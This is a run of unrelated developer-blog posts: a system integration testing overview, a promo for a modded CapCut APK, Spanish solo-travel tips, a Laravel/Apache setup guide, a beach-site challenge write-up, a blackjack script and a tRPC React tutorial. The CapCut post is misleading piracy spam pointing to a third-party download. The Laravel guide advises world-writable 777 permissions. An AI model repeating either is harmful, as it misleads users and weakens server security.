1. Ensures Interoperability: SIT ensures that various components or systems can work together as intended, providing a cohesive functionality.
2. Early Defect Detection: Identifying integration issues early in the development cycle reduces the cost and effort required to fix defects.
3. Validates System Requirements: It ensures that the integrated system meets the specified requirements and behaves as expected in real-world scenarios.
4. Improves Quality: By rigorously testing interactions between components, SIT helps enhance the overall quality and reliability of the software product.
**Types of System Integration Testing**
1. Big Bang Integration Testing:
o Description: All modules are integrated simultaneously, and the entire system is tested as a whole.
o Advantages: Simple and straightforward.
o Disadvantages: Difficult to isolate defects, making debugging challenging.
2. Incremental Integration Testing:
o Description: Modules are integrated and tested incrementally, either one by one or in groups.
o Advantages: Easier to identify and fix defects, as issues can be isolated to specific modules.
o Disadvantages: More time-consuming compared to Big Bang.
o Top-Down Integration Testing:
Description: Testing starts from the top-level modules and progresses to lower-level modules.
Advantages: Helps identify major design flaws early.
Disadvantages: Requires stub creation for lower-level modules.
o Bottom-Up Integration Testing:
Description: Testing begins with lower-level modules and progresses to higher-level modules.
Advantages: No need for stubs; lower-level functionality is tested first.
Disadvantages: May miss interface issues in the initial stages.
3. Sandwich Integration Testing:
o Description: Combines top-down and bottom-up approaches to meet in the middle.
o Advantages: Balances the benefits of both approaches.
o Disadvantages: More complex to implement and manage.
Methodologies for System Integration Testing
1. API Testing: Involves testing the APIs that connect different modules to ensure they function correctly and handle data as expected.
2. User Interface (UI) Testing: Focuses on verifying the interaction between different components through the user interface.
3. Service Virtualization: Simulates the behavior of dependent services that are not yet available or are costly to use in a test environment.
4. Data Flow Testing: Ensures that data is correctly passed between modules and that data integrity is maintained throughout the system.
**Steps Involved in System Integration Testing**
1. Planning:
o Define the scope and objectives of the integration tests.
o Identify the components or modules to be tested.
o Determine the testing approach (Big Bang, Incremental, etc.).
2. Designing Test Cases:
o Develop test cases based on integration points and data flows.
o Create detailed test scenarios covering all possible interactions between components.
3. Setting Up the Environment:
o Configure the test environment to replicate the production setup as closely as possible.
o Ensure all necessary hardware, software, and network configurations are in place.
4. Executing Tests:
o Run the integration test cases.
o Monitor the system for any errors or anomalies.
5. Analyzing Results:
o Review test results to identify defects or issues.
o Log any identified defects for further investigation and resolution.
6. Regression Testing:
o Re-test the system after defects are fixed to ensure that the changes have not introduced new issues.
7. Reporting:
o Document the test results, including any defects found and their resolution status.
o Provide a comprehensive report to stakeholders.
Best Practices for System Integration Testing
1. Early Integration: Start integration testing early in the development cycle to catch defects sooner.
2. Continuous Integration: Implement continuous integration practices to automatically test integrations with every build.
3. Automate Where Possible: Use automation tools to execute repetitive integration tests, saving time and effort.
4. Clear Communication: Ensure clear communication among team members regarding integration points and dependencies.
5. Mock Services: Use mock services to simulate interactions with external systems, reducing dependency on external factors.
**Challenges in System Integration Testing**
1. Complexity: Integrating multiple components can be complex, especially in large systems with many dependencies.
2. Environment Setup: Replicating the production environment for testing can be challenging and resource-intensive.
3. Data Management: Ensuring consistent and accurate test data across different modules can be difficult.
4. Intermittent Issues: Integration tests may uncover intermittent issues that are hard to reproduce and debug.
5. Coordination: Requires effective coordination among different development teams working on various components.
**Conclusion**
System Integration Testing is a critical phase in the software development lifecycle that ensures different system components work together seamlessly. By focusing on the interactions between modules, SIT helps identify and resolve issues early, improving the overall quality and reliability of the software product. Despite its challenges, implementing best practices such as early integration, continuous integration, and automation can significantly enhance the effectiveness of SIT. As software systems become increasingly complex and interconnected, the importance of thorough and systematic integration testing cannot be overstated.
| keploy |
1,881,423 | CapCut Video Editing Software 2024 (Latest Version) | Editing videos can be challenging, especially if you're new to it. But don't worry! CapCut Mod APK is... | 0 | 2024-06-08T16:01:21 | https://dev.to/chollasingh321445/capcut-video-editing-software-2024-latest-version-2c59 | beginners, career, design | Editing videos can be challenging, especially if you're new to it. But don't worry! CapCut Mod APK is here to help. This app, developed by Bytedance Pte. Ltd., offers premium unlocked features for free, making video editing easy and fun.
**CapCut Information Table
Feature Details**
**App Name** CapCut Mod APK
**Developer** Bytedance Pte. Ltd.
**Genre** Video Editor and Player
**Latest Version** v12.0.0
**File Size** 246 MB
**Mod Features** No Watermark, Premium Unlocked, No Ads
**Requirements** Android 5.0 and above
**Downloads** 500M+
**Rating** 4.4
**Reviews** 7.28M reviews
**Pricing** Free
**Available On** Google Play Store
**What is CapCut Mod APK?**
CapCut Mod APK is a free video editing app with all the premium features unlocked. Made by the creators of TikTok, it allows users to create high-quality videos without any ads or watermarks.
**Key Features of CapCut**
No Ads: Enjoy an ad-free experience.
Premium Unlocked: Access all premium features for free.
No Watermark: Export videos without any watermarks.
**How to Use Key Features
Key Frame Animation**
Select the video clip.
Tap the Keyframe icon to set the start and end points.
Adjust the zoom for a smooth animation.
**Smooth Slow Motion Effect**
Start a new project and import your video.
Mute the sound in the clip.
Split the video where you want the slow-motion effect.
Adjust the speed using the slider.
**Video Stabilization**
Start a new project and add your shaky footage.
Select "Stabilize" from the toolbar.
Choose the level of stabilization.
**Chroma Key (Green Screen)**
Upload your background footage.
Add the green screen effect as a layer.
Remove the chosen color.
Export the video.
**Mod Features of CapCut Pro APK**
No Ads: Enjoy editing without interruptions.
No Watermark: Export professional-looking videos.
Premium Unlocked: Access all tools and effects.
**Installing CapCut Mod APK**
From Our Website
Download the APK from [mycapcutapks.com](https://mycapcutapks.com/).
Rename the file and choose a download location.
Install the APK and open CapCut.
**From Google Play Store**
Open the Google Play Store.
Search for "CapCut App".
Click "Install" and wait for the process to complete.
Open the app.
**CapCut on Other Platforms**
CapCut is also available for PCs and iOS devices. Users can enjoy the same premium features on all platforms.
**Pros and Cons of CapCut App**
**Pros**
User-friendly interface
Free to use
High-quality export
Regular updates
No watermarks
**Cons**
Limited export options
Only one audio track per video
**Conclusion**
CapCut Mod APK is a powerful and easy-to-use video editing app with premium features available for free. Whether you're a beginner or a professional, CapCut offers all the tools you need to create stunning videos. Download it now from our website and start editing like a pro! | chollasingh321445 |
1,881,422 | ¿Qué tener en cuenta para viajar solo? | Cuidar tus pertenencias Cuidar tus pertenencias es una parte esencial de cualquier viaje personal.... | 0 | 2024-06-08T16:00:11 | https://dev.to/cornell_sang_b61d9b20a335/que-tener-en-cuenta-para-viajar-solo-4bn8 | Cuidar tus pertenencias
Cuidar tus pertenencias es una parte esencial de cualquier viaje personal. Primero, evita llevar demasiado dinero en efectivo y asegúrate de distribuir el dinero y documentos importantes como la identificación y el pasaporte en diferentes lugares, por ejemplo, uno en la cartera y otro en otro lugar. De esta manera, incluso si te roban la cartera, tus otras pertenencias estarán a salvo. En segundo lugar, en lugares públicos como estaciones, evita parecer desorientado o aceptar conversaciones de extraños para reducir el riesgo de ser un objetivo. Además, las estaciones de tren y los hoteles suelen ofrecer servicios de consigna para asegurar tu equipaje. Finalmente, antes de salir, verifica que todos tus documentos estén completos y asegúrate de tenerlos siempre contigo.
Mantener una comunicación constante
Mantener una comunicación constante es esencial durante un viaje personal. Primero, mantener contacto con familiares y amigos les permite conocer tu paradero y estado de seguridad, proporcionando una capa adicional de seguridad para tu viaje. Además, compartir tus experiencias y sentimientos de viaje puede brindarte apoyo emocional en momentos de soledad. Por lo tanto, es muy importante informar a tus seres queridos sobre tu plan de viaje y reportar tu paradero diariamente.
Prestar atención a la higiene alimentaria
Prestar atención a la higiene alimentaria es crucial durante un viaje, ya que afecta directamente la salud y la experiencia del viaje. Debido a las diferencias en la comida y el agua, los turistas pueden no estar acostumbrados a los alimentos locales, por ejemplo, personas del norte que viajan al sur pueden no acostumbrarse al arroz seco y duro. Por lo tanto, es importante elegir la comida adecuada, como optar por fideos en lugar de arroz si no estás acostumbrado. Además, debido al brote reciente de gripe aviar, evita consumir aves como pollo y pato. También evita comer en puestos callejeros y elige restaurantes limpios, y no aceptes alimentos o bebidas de extraños.
No salir hasta muy tarde solo por la noche
No salir hasta muy tarde solo por la noche, especialmente en el extranjero. Después del anochecer, ya sea en tu país o en el extranjero, evita permanecer afuera por largos períodos. Especialmente en países extranjeros, la seguridad puede no ser tan buena como en China. Si realmente deseas disfrutar de la vista nocturna de un lugar y quedarte hasta tarde, se recomienda tomar un taxi de regreso a tiempo. Si te sientes inseguro en el camino, ve rápidamente hacia lugares concurridos o finge estar hablando por teléfono para aumentar tu seguridad.
Comprar un seguro de viaje
Comprar un seguro de viaje es una preparación importante para viajar solo. Durante el viaje, pueden ocurrir varias situaciones imprevistas, como emergencias médicas, pérdida de documentos o problemas de salud. Un seguro de viaje generalmente cubre estos riesgos y su costo es razonable. Especialmente para viajes al extranjero, es más conveniente elegir una compañía de seguros que ofrezca un número de emergencia en chino las 24 horas. De esta manera, en caso de cualquier problema, puedes recibir ayuda y apoyo a tiempo, garantizando la seguridad y fluidez del viaje.
Ser diligente
Ser diligente es una actitud indispensable durante un viaje. Primero, antes del viaje, planifica tu itinerario en detalle e informa a tus familiares o amigos, incluyendo los lugares de alojamiento y la información de contacto, para que puedan conocer tu ubicación en todo momento. Al compartir tu itinerario en redes sociales, presta atención a la privacidad y seguridad, evitando revelar demasiada información personal en público. Además, viajar no es solo alojarse y descansar, sino también participar activamente en diversas actividades y experiencias culturales locales, enriqueciendo cada día. De esta manera, no solo se enriquece la experiencia del viaje, sino que también valorarás y recordarás esos momentos.
No caer en la tentación de lo barato
No caer en la tentación de lo barato es muy importante durante un viaje personal. Primero, evita usar medios de transporte sin garantías de seguridad, como taxis no oficiales, para asegurar tu propia seguridad. Además, mantén precaución con la comida y bebida ofrecida por los locales, no aceptes fácilmente para evitar posibles riesgos de seguridad. En bares, cafeterías y otros lugares, asegúrate de no dejar tu bebida sin supervisión para evitar ser engañado. Finalmente, en el viaje, mantén la integridad, no te aproveches de los demás y sé cauteloso con las cosas gratuitas o muy baratas para evitar caer en trampas.
Para más información, visita [Sandiario](https://sandiario.com/blogs/blog-sandiario/que-tener-en-cuenta-para-viajar-solo).
| cornell_sang_b61d9b20a335 | |
1,881,421 | Run Laravel locally on Ubuntu using Apache virtual host | Refresh APT metadata. sudo apt update Enter fullscreen mode Exit fullscreen... | 0 | 2024-06-08T15:58:57 | https://dev.to/medilies/run-laravel-locally-on-ubuntu-using-apache-virtual-host-chd | laravel, apache, ubuntu, php | Refresh APT metadata.
```bash
sudo apt update
```
## Installing MySQL
Install MySQL:
```bash
sudo apt install mysql-server
```
Enter MySQL to edit the `root` user password:
```bash
sudo mysql
```
```sql
ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';
```
Re-enter MySQL to create a database for our app, but using the credentials this time:
```bash
mysql -u root -p
```
```sql
CREATE DATABASE my_app;
```
References:
- <https://www.digitalocean.com/community/tutorials/how-to-install-lamp-stack-on-ubuntu#step-2-installing-mysql>
## Installing Apache
Ubuntu usually comes bundled with a running Apache server but still, I'll include the installation steps.
```bash
sudo apt-get install apache2 -y
```
Check if Apache is installed by verifying its version:
```bash
apache2ctl -v
```
Check if your firewall is active:
```bash
sudo ufw status
sudo ufw app list
```
If it returned `Status: active` then allow HTTP traffic on Apache:
```bash
sudo ufw allow in "Apache"
```
Now, visiting `http://localhost` should display "Apache2 Default Page".
References:
- <https://ubuntu.com/tutorials/install-and-configure-apache#2-installing-apache>
- <https://www.digitalocean.com/community/tutorials/how-to-install-lamp-stack-on-ubuntu#step-1-installing-apache-and-updating-the-firewall>
## Installing PHP
Register the following repo that enables the installation of multiple PHP versions at once.
```bash
sudo add-apt-repository ppa:ondrej/php
```
Install PHP `8.1`.
```bash
sudo apt install php8.1
```
> If you opt for a different version then just replace `8.1` with your version whenever you copy a command.
Add PHP module to Apache server:
```bash
sudo apt install libapache2-mod-php8.1
```
Install the extensions required by Laravel:
```bash
sudo apt install php8.1-mbstring php8.1-xmlrpc php8.1-soap php8.1-gd php8.1-xml php8.1-cli php8.1-zip php8.1-bcmath php8.1-tokenizer php8.1-json php8.1-pear
```
The newly installed extensions will be automatically enabled with their configs placed at `/etc/php/8.1/cli/conf.d/`.
References:
- <https://www.digitalocean.com/community/tutorials/how-to-install-lamp-stack-on-ubuntu#step-3-installing-php>
- <https://www.hostinger.com/tutorials/how-to-install-laravel-on-ubuntu>
## Installing composer
Check <https://getcomposer.org/download/>.
## A new Laravel app
```bash
cd
mkdir dev
cd dev
```
> I like to place my code at `~/dev`.
Create a new Laravel app:
```bash
composer global require laravel/installer
laravel new my_app --git
```
Set the correct permissions to enable Apache to execute your PHP code.
```bash
sudo chown -R www-data:www-data /home/me/dev/my_app
sudo chmod -R 777 /home/me/dev/my_app
sudo chmod o+x /home/me
sudo chmod o+x /home/me/dev
sudo chmod o+x /home/me/dev/
sudo chmod o+x /home/me/dev/my_app
```
Set `.env` with your app and database details.
## Faking a domain name
We will add a domain name for our app that only our machine knows about by editing `/etc/hosts`. We will configure it to let our machine know that the domain name `my_app.local` is on the loopback IP address `127.0.0.1`.
```bash
sudo nano /etc/hosts
```
```ini
# Add this line anywhere
127.0.0.1 my_app.local
```
Test that you configured the domain correctly by pinging it:
```bash
ping my_app.local
```
> Note that using internet top-level domains like `.com` will most likely not work. So I recommend sticking to `.local` for testing locally without HTTPS and without a registered domain name.
## Setting up the virtual host
Now we move to `/etc/apache2/sites-available/` and use as our base virtual host config file:
```bash
cd /etc/apache2/sites-available/
sudo cp 000-default.conf my_app-local.conf
sudo nano my_app-local.conf
```
And edit `my_app-local.conf` to look like this:
```ini
<VirtualHost *:80>
# The ServerName directive sets the request scheme, hostname and port that
# the server uses to identify itself. This is used when creating
# redirection URLs. In the context of virtual hosts, the ServerName
# specifies what hostname must appear in the request's Host: header to
# match this virtual host. For the default virtual host (this file) this
# value is not decisive as it is used as a last resort host regardless.
# However, you must set it for any further virtual host explicitly.
ServerName my_app.local
ServerAlias www.my_app.local
ServerAdmin webmaster@localhost
DocumentRoot /home/me/dev/my_app/public
<Directory /home/me/dev/my_app/public>
Options FollowSymLinks MultiViews
AllowOverride All
Require all granted
</Directory>
ReWriteEngine On
# Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
# error, crit, alert, emerg.
# It is also possible to configure the loglevel for particular
# modules, e.g.
#LogLevel info ssl:warn
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
# For most configuration files from conf-available/, which are
# enabled or disabled at a global level, it is possible to
# include a line for only one particular virtual host. For example the
# following line enables the CGI configuration for this host only
# after it has been globally disabled with "a2disconf".
#Include conf-available/serve-cgi-bin.conf
</VirtualHost>
```
Check the validity of the config you added:
```bash
sudo apache2ctl configtest
```
Enable your new site:
```bash
sudo a2ensite my_app-local.conf
```
Also, enable the rewrite module to be able to have URLs that do not point only to real files:
```bash
sudo a2enmod rewrite
```
The final thing to do is restart Apache to reload the new config:
```bash
sudo systemctl restart apache2
// or
sudo systemctl reload apache2
```
References:
- <https://ubuntu.com/tutorials/install-and-configure-apache>
## Finally
Visit `http://my_app.local`.
| medilies |
1,881,418 | Beach Escapes : The Top 10 | This is a submission for [Frontend Challenge... | 0 | 2024-06-08T15:56:15 | https://dev.to/sandip_kumardas_187bf96b/beach-escapes-the-top-10-11a3 | devchallenge, frontendchallenge, css, javascript | This is a submission for [Frontend Challenge v24.04.17]((https://dev.to/challenges/frontend-2024-05-29), Glam Up My Markup: Beaches
**Demo**
You can check out my project live here: Dev-challenges Beach
Here’s a quick demo:
https://skd2k24.github.io/Dev-challenges-Beach-/
Access the code at:
https://github.com/skd2k24/Dev-challenges-Beach-
**_Journey_**
**Inspiration and Idea**
I was inspired to build this website because I wanted to create a serene and inviting online space that reminds people of the beauty and relaxation of a beach vacation. The idea was to blend beautiful visuals with a simple, intuitive user experience.
**Development Process**
_1.Planning_:
I began by outlining the key sections I wanted on the website, such as a welcoming homepage, a gallery of beach images, and informative sections about beach activities and destinations.
_2.Design_:
Using [Figma/Sketch/Adobe XD], I designed wireframes and mockups to ensure the layout was both aesthetically pleasing and user-friendly. The design focused on using soothing colors and high-quality images to evoke a beach atmosphere.
_3.Technology Stack_:
o _Frontend_: The website was built using HTML, CSS, and JavaScript. I utilized libraries like Shery JS GSAP to ensure a better user experience
o _Hosting_: The website is hosted on GitHub Pages, which provides a simple and effective way to deploy static sites.
4._Implementation_:
o _Homepage:_ Features a welcoming banner with a stunning beach image, a brief introduction, and navigation links to other sections.
o _Information Sections_: Detailed sections about beach activities, destinations, and tips, styled using CSS for a clean and consistent look.
o _Interactive Elements_: Implemented interactive elements like hover effects and smooth scrolling to enhance user engagement.
**Challenges and Learning**
During the development process, I faced several challenges:
• _Responsive Design_: Ensuring the website looked great on all devices, from large desktop screens to small mobile phones. I learned to effectively use media queries and responsive design principles.
• _Smooth Scrolling_: While making the website smooth scrolling and the planning of scrolling animations are bit of problem.
**Future Plans**
I am particularly proud of the overall look and feel of the website, especially the seamless integration of high-quality visuals and smooth user interactions. Next, I hope to:
• _Add More Interactive Features:_ Such as a virtual tour of beach destinations or interactive maps.
• _SEO Optimization_: Improve search engine optimization to attract more visitors.
• _User Feedback_: Implement a feedback form to gather visitor input for continuous improvement. | sandip_kumardas_187bf96b |
1,881,420 | One beach to rule them all | This is a submission for [Frontend Challenge... | 0 | 2024-06-08T15:53:52 | https://dev.to/rcmonteiro/one-beach-to-rule-them-all-3nid | devchallenge, frontendchallenge, css, javascript | _This is a submission for [Frontend Challenge v24.04.17]((https://dev.to/challenges/frontend-2024-05-29), Glam Up My Markup: Beaches_
## What I Built
I created a simple responsive design using only CSS and pure JavaScript. And let me tell you... it was fun! It's so easy to use React and Tailwind, but working directly with the DOM was a refreshing and imperative experience, quite literally!
My goal was to develop a nice responsive design for browsing through beaches, adding more flair with an image for each beach on its details page.
## Demo
You can test the project on my GitHub Pages:
[https://rcmonteiro.github.io/dev.challenges/24.06.beaches/](https://rcmonteiro.github.io/dev.challenges/24.06.beaches/)
Or check out the code in my repository:
[https://github.com/rcmonteiro/dev.challenges/tree/main/24.06.beaches](https://github.com/rcmonteiro/dev.challenges/tree/main/24.06.beaches)
## Journey
The hardest part, as always, was choosing the colors and designing the layout. I love to code, but when it comes to design, it's a challenge. I really enjoyed sending direct commands to the DOM, just like in the '90s.
I challenged myself not to use any external libraries, and after overcoming many (a lot) of obstacles, I believe I built something truly nice.
I hope you enjoy it as well!
Feel free to make any changes or play around with it; this project is under the MIT license, so you can do whatever you want! =)
| rcmonteiro |
915,578 | How to build Blackjack | Did use js,html and some css to build a blackljack game. // object let player = { name: "ben", ... | 0 | 2021-12-02T15:00:44 | https://dev.to/benoah/how-to-build-blackjack-4cdp | javascript, html, css | Did use js,html and some css to build a blackljack game.
```js
// object
let player = {
name: "ben",
chips: 200,
sayHello: function () {
console.log("Heisann!");
},
};
player.sayHello();
let cards = []; // array -ordered list of item
let sum = 0;
let hasBlackJack = false;
let isAlive = false;
let message = "";
let messageEl = document.getElementById("message-el");
let sumEl = document.querySelector("#sum-el");
let cardsEl = document.querySelector("#cards-el");
let playerEl = document.getElementById("player-el");
playerEl.textContent = player.name + ": $" + player.chips;
// Create a function, getRandomCard(), that always returns the number 5
// FLOR REMOVE DECIMALS
function getRandomCard() {
// if 1 -> return 11
// if 11-13 -> return 10
let randomNumer = Math.floor(Math.random() * 13) + 1;
if (randomNumer > 10) {
return 10;
} else if (randomNumer === 1) {
return 11;
} else {
return randomNumer;
}
}
function startGame() {
isAlive = true;
let firstCard = getRandomCard();
let secondCard = getRandomCard();
cards = [firstCard, secondCard];
sum = firstCard + secondCard;
renderGame();
}
function renderGame() {
cardsEl.textContent = "Cards: ";
for (let i = 0; i < cards.length; i++) {
cardsEl.textContent += cards[i] + " ";
}
sumEl.textContent = "sum: " + sum;
if (sum <= 20) {
message = "Do you want to draw a new card? 🙂";
} else if (sum === 21) {
message = "Wohoo! You've got Blackjack! 🥳";
hasBlackJack = true;
} else {
message = "You're out of the game! 😭";
isAlive = false;
}
messageEl.textContent = message;
}
function newCard() {
// Only allow the player to get a new card if she IS alive and does NOT have Blackjack
if (isAlive === true && hasBlackJack === false) {
let card = getRandomCard();
sum += card;
cards.push(card);
renderGame();
}
}
``` | benoah |
1,881,419 | Using TRPC For Backend Requests With React | by Ikeh Akinyemi Throughout this article, you will learn the intricacies of using... | 0 | 2024-06-08T15:50:51 | https://dev.to/asayerio_techblog/using-trpc-for-backend-requests-with-react-2lff |
by [Ikeh Akinyemi](https://blog.openreplay.com/authors/ikeh-akinyemi)
<blockquote><em>
Throughout this article, you will learn the intricacies of using [tRPC](https://trpc.io/) in frontend development with React, including its role in frontend applications and how it compares to traditional API communication methods.The discussion will extend to advanced features, security, authentication, error handling, and debugging, ensuring you are well-equipped to leverage tRPC in your projects.
</em></blockquote>
<div style="background-color:#efefef; border-radius:8px; padding:10px; display:block;">
<hr/>
<h3><em>Session Replay for Developers</em></h3>
<p><em>Uncover frustrations, understand bugs and fix slowdowns like never before with <strong><a href="https://github.com/openreplay/openreplay" target="_blank">OpenReplay</a></strong> — an open-source session replay suite for developers. It can be <strong>self-hosted</strong> in minutes, giving you complete control over your customer data.</em></p>
<img alt="OpenReplay" style="margin-top:5px; margin-bottom:5px;" width="768" height="400" src="https://raw.githubusercontent.com/openreplay/openreplay/main/static/openreplay-git-hero.svg" class="astro-UXNKDZ4E" loading="lazy" decoding="async">
<p><em>Happy debugging! <a href="https://openreplay.com" target="_blank">Try using OpenReplay today.</a></em><p>
<hr/>
</div>
Let's start by discussing how tRPC functions within the frontend context—the workflow involved in making requests to the backend—comparing it with traditional API communication methods and highlighting its key benefits for frontend development, including type safety, development speed, and reduced boilerplate.
### How tRPC Works
As a framework of [RPC](https://en.wikipedia.org/wiki/Remote_procedure_call), tRPC communication between the frontend and backend is streamlined through a direct invocation of TypeScript functions, known as procedures. This invocation process starts when the frontend calls a tRPC procedure, like a local function call intended for backend execution. The server handles the request, which identifies and executes the corresponding procedure based on its name and signature.
In the above workflow, the framework enforces type safety by validating input arguments against the TypeScript types defined for the procedure, ensuring data integrity before and after execution. The backend procedure performs its intended operations, such as accessing a database or processing logic, within a secure environment. Upon completion, the output is type-checked and sent back to the frontend, where it is directly utilized without additional parsing or type assertions.
### Comparison with Traditional API Communication Methods
tRPC offers a modern alternative in scenarios where traditional methods like REST or GraphQL may falter, standing out in several key areas:
- **Real-Time Data Synchronization**: It excels in applications needing live updates (e.g., chat apps, dashboards) by simplifying real-time communication through subscriptions, starkly contrasting REST's limitations and GraphQL's setup complexity.
- **Direct Backend Access**: It offers direct calls to backend functions, eliminating the need for separate API endpoints. This feature is especially beneficial for rapid prototyping and projects with tight frontend-backend integration.
- **Complex Data Type Safety**: Its deep TypeScript integration ensures unparalleled type safety for complex data structures, enhancing data integrity and easing debugging compared to GraphQL's typing and REST's more general approach.
These contrasts highlight the efficiency and developer-friendly nature of tRPC. Next, let's dive into development, and see how to set up our frontend application.
## Setting Up tRPC Frontend with React
In this section, you'll explore and learn how to extend an existing React project with tRPC. The React project is an API Keys Manager with the below UI:

Using the following commands, clone the project to your local machine, then change to the `minimal-version` branch of the repository and install all the dependencies needed. This contains the server source code and the React source code we will extend.
```bash
git clone git@github.com:Ikeh-Akinyemi/APIKeyManager.git
cd APIKeyManager
git checkout minimal-version
cd server; npm install; cd ..
cd client; npm install
```
Next, let's install the following packages that will be used to set up the tRPC client:
```bash
npm install @trpc/server @trpc/client @trpc/react-query @tanstack/react-query
```
After installing the above packages, create a `utils` folder in the `./client/src` directory, and create a `trpc.ts` file within the folder:
```bash
mkdir utils; cd utils; touch trpc.ts
```
You'll set up tRPC within this file using the code snippet below:
```jsx
// filename: ./client/src/utils/trpc.ts
import type { AppRouter } from '../../../server/src/api/router/_app';
import { createTRPCReact } from '@trpc/react-query';
export const trpc = createTRPCReact<AppRouter>();
```
The first line of the above code snippet uses TypeScript's `import type` syntax to import only the type definition for `AppRouter` defined within the module located at `../../../server/src/api/router/_app`:
```typescript
// filename: ./server/src/api/router/_app
...
export const appRouter = router({
users: userRouter,
auth: authRouter,
apikeys: apiKeyRouter,
healthcheck: publicProcedure.query(async () => {
return {
status: "success",
message: "server is healthy",
};
}),
});
export type AppRouter = typeof appRouter;
```
The above `appRouter` defines group router namespace—users, auth, and apikeys—and a procedure, `healthcheck`. With this setup, you can call a `create` procedure under the `users` namespace like this, `/api/users.create`.
The line `export const trpc = createTRPCReact<AppRouter>();` initializes tRPC for use in a React application, specifically tailoring it to the shape of your API as defined by `AppRouter`. The function call to `createTRPCReact`, a utility provided by tRPC, creates a set of React hooks and utilities tailored for your setup. `<AppRouter>` is a TypeScript generic parameter that specifies the router configuration you use in your application. `AppRouter` is typically defined in your backend code, where you define all your procedures (API endpoints). By passing `AppRouter` as a generic to `createTRPCReact`, you're informing TypeScript about the shape of your API, which enables type safety and autocompletion in the frontend when you use tRPC utilities to call your API.
### Initialize tRPC Client
Next, let's integrate the tRPC setup into the React application. Inside the `./client/src/components/App.tsx`, you'll create a client and wrap the app with the tRPC provider, alongside the `QueryClientProvider` from `@tanstack/react-query`. This setup enables you to seamlessly use tRPC's capabilities for type-safe API calls throughout your application, ensuring that the data fetching and mutations adhere to the types defined in your server.
```jsx
// filename: ./client/src/components/App.tsx
...
import { useState } from "react";
import { QueryClient, QueryClientProvider } from "@tanstack/react-query";
import { trpc } from "../utils/trpc";
import { httpBatchLink } from "@trpc/client";
import { getAuthCookie } from "../utils/helper";
function App() {
const [queryClient] = useState(() => new QueryClient());
const [trpcClient] = useState(() =>
trpc.createClient({
links: [
httpBatchLink({
url: "http://localhost:6789/api",
async headers() {
return {
authorization: `Bearer ${getAuthCookie()}`,
};
},
}),
],
}),
);
return (
<trpc.Provider client={trpcClient} queryClient={queryClient}>
<QueryClientProvider client={queryClient}>
<div className="App">{/* components*/}</div>
</QueryClientProvider>
</trpc.Provider>
);
}
export default App;
```
In the above snippet, we use a React hook to initialize the query and the client. The function call,`trpc.createClient()`, creates a client instance with the specified configuration. The `links` property is an array containing middleware functions that intercept and process requests made by the client. `httpBatchLink` is a link provided by tRPC for making HTTP requests in batches. It allows bundling multiple requests into a single HTTP call for improved performance. `url` specifies the endpoint URL where the server is located. The `headers()` function dynamically generates headers for the HTTP request. In this case, it retrieves the authorization token using the `getAuthCookie()` function and includes it in the request headers.
Next, let's create the file, `./client/src/utils/helpers.ts`, and set up the functions `saveAuthTokenToCookie` and `getAuthCookie` for saving and getting the `AccessToken` return from the backend during authentication.
```typescript
// filename: ./client/src/utils/helpers.ts
interface AccessToken {
token: string | undefined;
expiryTime: string | undefined;
}
// saveTokenToCookie saves the accessToken and expiryTime to a cookie
export const saveAuthTokenToCookie = ({
token,
expiryTime,
}: AccessToken): void => {
document.cookie = `accessToken=${token};expires=${expiryTime && new Date(expiryTime).toUTCString()};path=/`;
};
// getCookie retrieves a cookie by name
export function getAuthCookie(name: string = "accessToken"): string {
const cookieValue = `; ${document.cookie}`;
const cookieParts = cookieValue.split(`; ${name}=`);
if (cookieParts.length === 2) {
const [token] = cookieParts.pop()?.split(";") ?? [""];
return token;
}
return "";
}
```
The above code snippet utilizes the `document.cookie` API to store and retrieve access tokens that would be used for subsequent requests after logging into the web app. We'll discuss about authentication later in the article.
### Handling state and reactivity with tRPC in React
Handling state and reactivity isn't different when using tRPC with React. In this section, you'll explore mutation and query for creating and retrieving API keys from the backend.
For mutation, we will update the `CreateAPIKeyModal` component implementation to utilize the `useMutation` hook for `createAPIKey` procedure to create API keys on the backend.

Open the file, `./client/src/components/Modal/Modals.tsx`, and update the `CreateAPIKeyModal` component implementation with the following:
```jsx
// filename: ./client/src/components/Modal/Modals.tsx
import { trpc } from "../../utils/trpc";
...
const CreateAPIKeyModal: React.FC<CreateAPIKeyModalProps> = ({
closeModal,
}) => {
...
const mutation = trpc.apikeys.createAPIKey.useMutation();
const handleSubmit = async (event: React.FormEvent<HTMLFormElement>) => {
event.preventDefault();
mutation.mutate({
websiteUrl: formData.websiteUrl,
name: formData.name,
});
closeModal(); // Close the modal upon submission
};
useEffect(() => {
if (mutation.isSuccess) {
window.location.reload();
}
}, [mutation.isSuccess]);
return <div className="modal-overlay">{/* elements remain the same.*/}</div>;
};
```
The `CreateAPIKeyModal` component now includes a `mutation` variable initialized with `trpc.apikeys.createAPIKey.useMutation()`, which sets up the mutation for creating an API key. Upon form submission triggered by `handleSubmit`, the mutation is executed with the data from the form fields (`websiteUrl` and `name`). After triggering the mutation, the modal is closed using the `closeModal` function.
Additionally, an `useEffect` hook monitors the mutation's success state. When the mutation is successful (`mutation.isSuccess`), a page reload is triggered using `window.location.reload()`. This ensures that any changes resulting from creating a new API key are reflected in the UI.
Moving on to the query, let's update the `KeysSection` components to fetch and display all the existing API keys from the backend.
```jsx
// filename: ./client/src/components/Keys/Keys.tsx
import Key, { KeyProps } from "./Key";
import { trpc } from "../../utils/trpc";
const KeysSection: React.FC = () => {
...
const [keys, setKeys] = useState<KeyProps[]>([]);
const { data: { data: resp } = {} } = trpc.apikeys.getAPIKeys.useQuery();
useEffect(() => {
if (resp?.apiKeys) {
setKeys(resp.apiKeys as KeyProps[]);
}
}, [resp]);
return (
<>
<div className="keys-section">
...
{keys.map((key) => (
<Key
key={`${key.id}-${key.token}`}
id={key.id}
userId={key.userId}
token={key.token}
websiteUrl={key.websiteUrl}
name={key.name}
permissions={key.permissions}
expiryDate={key.expiryDate}
isActive={key.isActive}
createdAt={key.createdAt}
/>
))}
</div>
...
</>
);
};
```
The `KeysSection` component now includes a state variable `keys` to store the fetched API keys. The `useQuery` hook from `trpc.apikeys.getAPIKeys` is used to fetch the API keys data, and the response is de-structured to access the `data` property.
Within the `useEffect` hook, we check if the `resp` object contains `apiKeys` data. If API keys are present, they are set in the `keys` state variable for rendering in the UI. Each API key is then mapped to a `Key` component, passing the necessary props for display.

<CTA_Middle_Cloud />
## Advanced tRPC Features in Frontend Applications
